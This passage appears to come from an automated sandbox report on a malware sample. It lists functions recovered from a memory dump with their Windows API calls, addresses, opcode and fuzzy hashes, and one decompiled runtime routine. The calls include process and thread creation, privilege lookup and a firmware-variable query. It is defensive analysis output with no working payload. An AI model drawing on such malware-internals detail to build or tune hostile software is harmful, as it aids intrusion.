                                                                                                            • Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                            • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                            • Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
                                                                                                            • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004072F4, Relevance: 1.7, APIs: 1, Instructions: 157threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 004072EB
                                                                                                              • Part of subcall function 00407270: PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004072CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            • Opcode ID: 3b42a73d309e75c11951522f5aa32ac8369a41d599062f4291c52ebe1f7873b3
                                                                                                            • Instruction ID: 4328152f470a93e3ba60cc8293393db4891ec3ff36594f794685143f9609cb11
                                                                                                            • Opcode Fuzzy Hash: 3b42a73d309e75c11951522f5aa32ac8369a41d599062f4291c52ebe1f7873b3
                                                                                                            • Instruction Fuzzy Hash: 965184B19042099FDB14DF25D885BEBB7F8EB49304F00446EF959A7281DB34B941CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                            • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                            • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004185A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInternalProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2186235152-0
                                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                            • Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
                                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                            • Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00417020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040CCE0,?,?), ref: 0041705C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2422867632-0
                                                                                                            • Opcode ID: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                                            • Instruction ID: b78701d23b733cf61cc64e52f64d78393c25996acb9f2dcfa8c92e01c1838811
                                                                                                            • Opcode Fuzzy Hash: e8a682d6ca176058e0d851ff1510c3e9173edc0f8f67161c925dea0b5d29092c
                                                                                                            • Instruction Fuzzy Hash: 5BE092733903043AE3306599AC03FE7B7ACCB85B25F14002AFB0DEB2C1D599F84142A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00418640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFB2,0040CFB2,?,00000000,?,?), ref: 00418670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                            • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                            • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00407C73,?), ref: 0040D44B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                            • Instruction ID: bd57579902106536a8e281bfc369a8ff14161c3dcb995b1f5c453e75d831fb6a
                                                                                                            • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                            • Instruction Fuzzy Hash: 6FD05E71B503042AE610BAA49C03F6672885B44B04F494074F948E63C3D968E5004165
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B7967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                                            • Instruction ID: bec34b670d5326920ac72b5bb9364ddcc73b5106a9da09ff301e3e43f2837250
                                                                                                            • Opcode Fuzzy Hash: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                                            • Instruction Fuzzy Hash: 66B09B729014C5C5D711E7604608F177A40F7E0741F16C1A6D1160645A4778C491F6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00404A00, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 177COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 00404A99
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentFirmwareVariable
                                                                                                            • String ID: $.$D$\$x
                                                                                                            • API String ID: 3150624800-477071024
                                                                                                            • Opcode ID: 0c201eaaecf3b455fca0eb2074c8a29a4be11b16435c6f5941c682fcc4a330d1
                                                                                                            • Instruction ID: 2e8eee7692668be15c0c1aa0177241d4ee8540a5fa1e180bd7819ddeea45b040
                                                                                                            • Opcode Fuzzy Hash: 0c201eaaecf3b455fca0eb2074c8a29a4be11b16435c6f5941c682fcc4a330d1
                                                                                                            • Instruction Fuzzy Hash: 515196B19002147AE710DFA5DC42FEF73BCDF44704F04456EFA08A6181EB79AA44CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BCFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                            0x00bcfdda
                                                                                                            0x00bcfde2
                                                                                                            0x00bcfde5
                                                                                                            0x00bcfdec
                                                                                                            0x00bcfdfa
                                                                                                            0x00bcfdff
                                                                                                            0x00bcfe0a
                                                                                                            0x00bcfe0f
                                                                                                            0x00bcfe17
                                                                                                            0x00bcfe1e
                                                                                                            0x00bcfe19
                                                                                                            0x00bcfe19
                                                                                                            0x00bcfe19
                                                                                                            0x00bcfe20
                                                                                                            0x00bcfe21
                                                                                                            0x00bcfe22
                                                                                                            0x00bcfe25
                                                                                                            0x00bcfe40

                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BCFDFA
                                                                                                            Strings
                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BCFE2B
                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BCFE01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.598216029.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.598444470.0000000000C2B000.00000040.00000001.sdmp Download File
                                                                                                            • Associated: 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                            • API String ID: 885266447-3903918235
                                                                                                            • Opcode ID: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                                            • Instruction ID: 0214fcb5e07229ca3d02f8ab58e5e9592c6cf607fc6c1b2337d6afa1075feeed
                                                                                                            • Opcode Fuzzy Hash: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                                            • Instruction Fuzzy Hash: B0F0F632200602BFD6241A45DC06F33BF9AEB44731F244399F628561E2DA62FCA096F0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%